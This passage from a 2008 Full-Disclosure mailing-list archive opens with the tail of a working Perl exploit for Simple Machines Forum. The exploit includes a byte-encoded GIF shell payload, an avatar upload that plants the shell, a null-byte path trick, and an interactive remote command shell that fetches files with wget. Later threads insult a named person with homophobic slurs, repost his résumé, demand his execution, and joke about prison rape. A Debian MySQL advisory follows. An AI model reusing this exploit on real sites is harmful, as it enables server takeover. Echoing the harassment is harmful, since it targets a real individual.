			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying
to view does not exist/;

die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => "echo expl0ited");

&shell
	if $ret->as_string =~ /expl0ited/;

$ret = $ua->request(
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
$ret = $ua-
>get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=them
e_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---
/s;

	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);

    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);


		exit
			unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?)
(.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --
password=$pass < $base; rm $base;";
        }

        $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to
file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSax8ACgkQxKkly4PzmN6NRwP/eL/Q6zKYoeuNmOlPk8QMesJjVUu5
oe+zFmLwOBexDYI0JRSUqPSyDglh9JsD270gwLMzwoE1jeg8tmeLtI6QmgTIXL+D0e6X
S/XQ+UFA6+2lq5QwGSOZpstbQAqgvM/rmynP0ayeu23Gmk9yMiOq32jgHRiBRDl1S/EW
6uD17+4=
=/Wd7
-----END PGP SIGNATURE-----

--
Aching back? Sore neck? Cick to learn how to manage your pain.
http://tagline.hushmail.com/fc/Ioyw6h4fPGBbhjqD6loOAXpR5I2hoUFDQcz2E2xsVbU1vXNQPDxTZ2/



From n0td3v at gmail.com  Thu Nov  6 04:58:43 2008
From: n0td3v at gmail.com (not dev)
Date: Wed, 5 Nov 2008 20:58:43 -0800
Subject: [Full-disclosure] Death of a Gay h4x0r!
Message-ID: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>

Death of a Gay H4x0r
By: n0td3v



Whitehats rejoice.  Gadi Evron and the Internet Defense League proudly
announces that the Unix Terrorist aka Jim Jones aka Stephen Watt is no
longer a threat to society.  Stephen is most well known for back
dooring of the Qualys Vulnerability Scanner as well as being the
founder and brains behind the failed pr0j3ct m4yh3m and PHC and el8
and bantown and Internet Justice.

Let us all rejoice by following Gadi Evron in his love of the cock and
all things whitehat.

http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1337803,00.html

http://www.usdoj.gov/criminal/cybercrime/wattCharge.pdf

Resume of Stephen Watt

Real Time Trading Systems Developer

Location

   Greater New York City Area

Industry

   Information Technology and Services

Current

       * Developer at derivatives.com

Past

       * Associate at Morgan Stanley

       * Security Developer at Qualys Inc.

Education

       * University of Central Florida

Summary

Previous experience has included security vulnerability research and
development in a major industry-leading security vulnerability
assessment firm. More recently, work involved network-security related
development at a major financial services institution, as well as
general infrastructure toolkit development.

Current work consists of writing code relating to securities exchange
infrastructure and portfolio management functionality.

Goals for the future are researching and engineering algorithmic
trading platforms.

Applications Experience

Developer - derivatives.com
Information Technology and Services industry

February 2007 ? Present (1 year 10 months)

Portfolio and exchanges interfaces development for a real time trading system

Associate - Morgan Stanley

Public Company; Information Technology and Services industry

May 2004 ? February 2007 (2 years 10 months)

Application infrastructure development and in house security toolkit development

Security Developer - Qualys Inc.

Privately Held; 51-200 employees; Information Technology and Services industry

June 2001 ? August 2002 (1 year 3 months)

Conducted research and development for an industry-leading network
vulnerability scanner, in a C/UNIX environment.  Performed binary-only
system audits of proprietary operating systems and developed
proof-of-concept exploits for discovered vulnerabilities

Education

University of Central Florida
2000 ? 2003



The Internet Defense League or IDL recommends that all whitehat follow
this trial and write letters to the prosecuting attorney and the judge
and your congressman to make sure that this terrorist and petty
criminal is brought to justice and receives the maximum possible
penalty.  A letter and petition asking for the death penalty or
immediate shipment to Guantanamo Bay as an enemy combatant has already
been forwarded to President elect Barack Obama.  Stephen Watt is the
reason the world economy is failing.  Stephen Watt did this for known
terrorist groups.

You can have Internet Justice IDL will take real life justice in trade.



From hdw at kallisti.se  Thu Nov  6 05:30:35 2008
From: hdw at kallisti.se (Anders B Jansson)
Date: Thu, 06 Nov 2008 06:30:35 +0100
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>
Message-ID: <491280FB.3020100@kallisti.se>

Who cares?

A petty thief spending time getting sodomized in prison?

Well, if you you don't wanna play the game, then don't play the game.

Obviously he wanted to played the game, and now he'll the second round of the game.

// hdw

not dev wrote:
> Death of a Gay H4x0r
> By: n0td3v
> 
> 
> 
> Whitehats rejoice.  Gadi Evron and the Internet Defense League proudly
> announces that the Unix Terrorist aka Jim Jones aka Stephen Watt is no
> longer a threat to society.  Stephen is most well known for back
> dooring of the Qualys Vulnerability Scanner as well as being the
> founder and brains behind the failed pr0j3ct m4yh3m and PHC and el8
> and bantown and Internet Justice.
> 
> Let us all rejoice by following Gadi Evron in his love of the cock and
> all things whitehat.
> 
> http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1337803,00.html
> 
> http://www.usdoj.gov/criminal/cybercrime/wattCharge.pdf
> 
> Resume of Stephen Watt
> 
> Real Time Trading Systems Developer
> 
> Location
> 
>    Greater New York City Area
> 
> Industry
> 
>    Information Technology and Services
> 
> Current
> 
>        * Developer at derivatives.com
> 
> Past
> 
>        * Associate at Morgan Stanley
> 
>        * Security Developer at Qualys Inc.
> 
> Education
> 
>        * University of Central Florida
> 
> Summary
> 
> Previous experience has included security vulnerability research and
> development in a major industry-leading security vulnerability
> assessment firm. More recently, work involved network-security related
> development at a major financial services institution, as well as
> general infrastructure toolkit development.
> 
> Current work consists of writing code relating to securities exchange
> infrastructure and portfolio management functionality.
> 
> Goals for the future are researching and engineering algorithmic
> trading platforms.
> 
> Applications Experience
> 
> Developer - derivatives.com
> Information Technology and Services industry
> 
> February 2007 ? Present (1 year 10 months)
> 
> Portfolio and exchanges interfaces development for a real time trading system
> 
> Associate - Morgan Stanley
> 
> Public Company; Information Technology and Services industry
> 
> May 2004 ? February 2007 (2 years 10 months)
> 
> Application infrastructure development and in house security toolkit development
> 
> Security Developer - Qualys Inc.
> 
> Privately Held; 51-200 employees; Information Technology and Services industry
> 
> June 2001 ? August 2002 (1 year 3 months)
> 
> Conducted research and development for an industry-leading network
> vulnerability scanner, in a C/UNIX environment.  Performed binary-only
> system audits of proprietary operating systems and developed
> proof-of-concept exploits for discovered vulnerabilities
> 
> Education
> 
> University of Central Florida
> 2000 ? 2003
> 
> 
> 
> The Internet Defense League or IDL recommends that all whitehat follow
> this trial and write letters to the prosecuting attorney and the judge
> and your congressman to make sure that this terrorist and petty
> criminal is brought to justice and receives the maximum possible
> penalty.  A letter and petition asking for the death penalty or
> immediate shipment to Guantanamo Bay as an enemy combatant has already
> been forwarded to President elect Barack Obama.  Stephen Watt is the
> reason the world economy is failing.  Stephen Watt did this for known
> terrorist groups.
> 
> You can have Internet Justice IDL will take real life justice in trade.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 
// hdw



From hawkgotyou at gmail.com  Thu Nov  6 08:58:12 2008
From: hawkgotyou at gmail.com (BlackHawk)
Date: Thu, 6 Nov 2008 09:58:12 +0100
Subject: [Full-disclosure] [0day] Simple Machines Forum * <= 1.1.6 Code
	Execution
In-Reply-To: <20081106035719.837932803B@smtp.hushmail.com>
References: <20081106035719.837932803B@smtp.hushmail.com>
Message-ID: <621e1d10811060058j4894f9abw5742595d8342fd35@mail.gmail.com>

> # @descp: In loving memory of the rare bone marrow disease that
> killed rgod.
> #         We can't thank you enough for killing a bug killer.

no comment.. :|



From kokanin at gmail.com  Thu Nov  6 09:54:36 2008
From: kokanin at gmail.com (=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=)
Date: Thu, 6 Nov 2008 10:54:36 +0100
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: <491280FB.3020100@kallisti.se>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>
	<491280FB.3020100@kallisti.se>
Message-ID: <a2e8ca0811060154n1ff36248q1c6a7f620ae49b1d@mail.gmail.com>

On Thu, Nov 6, 2008 at 6:30 AM, Anders B Jansson <hdw at kallisti.se> wrote:

> Obviously he wanted to played the game, and now he'll the second round of the game.

And now he accidentally the entire fleshlight!



From devin at debian.org  Thu Nov  6 04:20:00 2008
From: devin at debian.org (Devin Carraway)
Date: Thu, 06 Nov 2008 04:20:00 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1662-1] New mysql-dfsg-5.0
	packages fix authorization bypass
Message-ID: <E1KxwLg-0007w1-AP@klecker.debian.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1662-1                  security at debian.org
http://www.debian.org/security/                           Devin Carraway
November 06, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mysql-dfsg-5.0
Vulnerability  : authorization bypass
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-4098
Debian Bug     : 480292

A symlink traversal vulnerability was discovered in MySQL, a
relational database server.  The weakness could permit an attacker
having both CREATE TABLE access to a database and the ability to
execute shell commands on the database server to bypass MySQL access
controls, enabling them to write to tables in databases to which they
would not ordinarily have access.

The Common Vulnerabilities and Exposures project identifies this
vulnerability as CVE-2008-4098.  Note that a closely aligned issue,
identified as CVE-2008-4097, was prevented by the update announced in
DSA-1608-1.  This new update supercedes that fix and mitigates both
potential attack vectors.

For the stable distribution (etch), this problem has been fixed in
version 5.0.32-7etch8.

We recommend that you upgrade your mysql packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz
    Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch8.dsc
    Size/MD5 checksum:     1117 6456a5396b56431a31e2121805ef3208
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch8.diff.gz
    Size/MD5 checksum:   269277 bc749451446872ac8c8567ed60b0eea6

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch8_all.deb
    Size/MD5 checksum:    48142 761dce88bf46026622550e503800d4c3
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch8_all.deb
    Size/MD5 checksum:    54452 64140dddeb7bd50098ddc6222b4d2939
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch8_all.deb
    Size/MD5 checksum:    46068 0a67c6a61d08bf716c0af68da1585563

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_alpha.deb
    Size/MD5 checksum:  8405572 ceda4648a1bbc48f087f8763350c04e7
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_alpha.deb
    Size/MD5 checksum: 27385278 b5435c8d77f64e1855300e1988570333
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_alpha.deb
    Size/MD5 checksum:  8909972 e76dc32887c4baf25721eff971aa9d60
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_alpha.deb
    Size/MD5 checksum:    48170 c6eb1472bb6cf4fad708c23dd9a78cf8
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_alpha.deb
    Size/MD5 checksum:  1947544 73d751f95dc5604d159df910a3157f45

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_amd64.deb
    Size/MD5 checksum:  1831314 6ed359b8f2fb92c5c9846a3743e4b0f8
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_amd64.deb
    Size/MD5 checksum:  7549266 ca948f5c66f2172927acd9e5cbf7c9ae
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_amd64.deb
    Size/MD5 checksum:  7371842 7ff54b963be65b5e7d18425cd313bbcb
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_amd64.deb
    Size/MD5 checksum:    48178 127af2553cc1fd9e89f1f69a2eb44709
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_amd64.deb
    Size/MD5 checksum: 25813464 06dc8568f055c04dc4ddfd19de79a704

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_arm.deb
    Size/MD5 checksum:    48230 2a5b1b7b2ed8c94301fc60bd49be7991
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_arm.deb
    Size/MD5 checksum:  7208004 9e268d05c77d521dbe0366961534cdf2
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_arm.deb
    Size/MD5 checksum: 25347882 b89ba96f815a27ebe70014d8c16e6bc0
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_arm.deb
    Size/MD5 checksum:  6930850 21ec3a8f5a6634454db8dec30fea9e65
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_arm.deb
    Size/MD5 checksum:  1748390 1877d302ebc91e8ccf104ba2d75479a6

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_hppa.deb
    Size/MD5 checksum: 27178846 d5b6eb3072bb2e8f2d114b182701a736
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_hppa.deb
    Size/MD5 checksum:  8060958 f4d89fec611eb37939d98f3e52391b21
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_hppa.deb
    Size/MD5 checksum:    48174 be34e4d2b05e4b294f5a3396611d4126
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_hppa.deb
    Size/MD5 checksum:  1920860 8ef8d38dc53e5f81eebcad330103062a
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_hppa.deb
    Size/MD5 checksum:  8003664 50496388e230ba0e337fadb5611c1bec

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_i386.deb
    Size/MD5 checksum:  1792994 2ee1e253198f7f67be79b40fbcee703a
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_i386.deb
    Size/MD5 checksum:  6961428 8be34f2ed518aa47148502b93e468ac0
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_i386.deb
    Size/MD5 checksum: 25233474 cf39de0d83a65da443fb77e37976d19b
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_i386.deb
    Size/MD5 checksum:  7199354 d144813e5cd27c684cb8ff45a987159e
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_i386.deb
    Size/MD5 checksum:    48166 2f4ab0db379d477d4ea15191a1ff4a7c

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_ia64.deb
    Size/MD5 checksum:  2115810 09e39bed782c6c2e7d689aa999adbfb1
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_ia64.deb
    Size/MD5 checksum: 10342902 c091c2d6b6f02d120b513f07ecada159
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_ia64.deb
    Size/MD5 checksum:  9739330 f158dd90752b99efe92bca049b991696
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_ia64.deb
    Size/MD5 checksum: 30403740 c3daa72e6e34c54f8053887a52395e36
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_ia64.deb
    Size/MD5 checksum:    48170 b9f94375cccf2cb2a3aff60b232b400b

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_mips.deb
    Size/MD5 checksum:  7674430 311032237de0d11e91d591b006ab6e60
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_mips.deb
    Size/MD5 checksum:    48214 0751225fd59fce147105362c6cc30b16
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_mips.deb
    Size/MD5 checksum:  7759738 74a1bd32b13f0c57f67100b6c0422d6e
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_mips.deb
    Size/MD5 checksum:  1835426 f425af4483842630558bdcaaba7ac1ee
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_mips.deb
    Size/MD5 checksum: 26472386 ed2e2a0eb36de7424d5bd03ab8f3b8f7

mipsel architecture (MIPS (Little Endian))

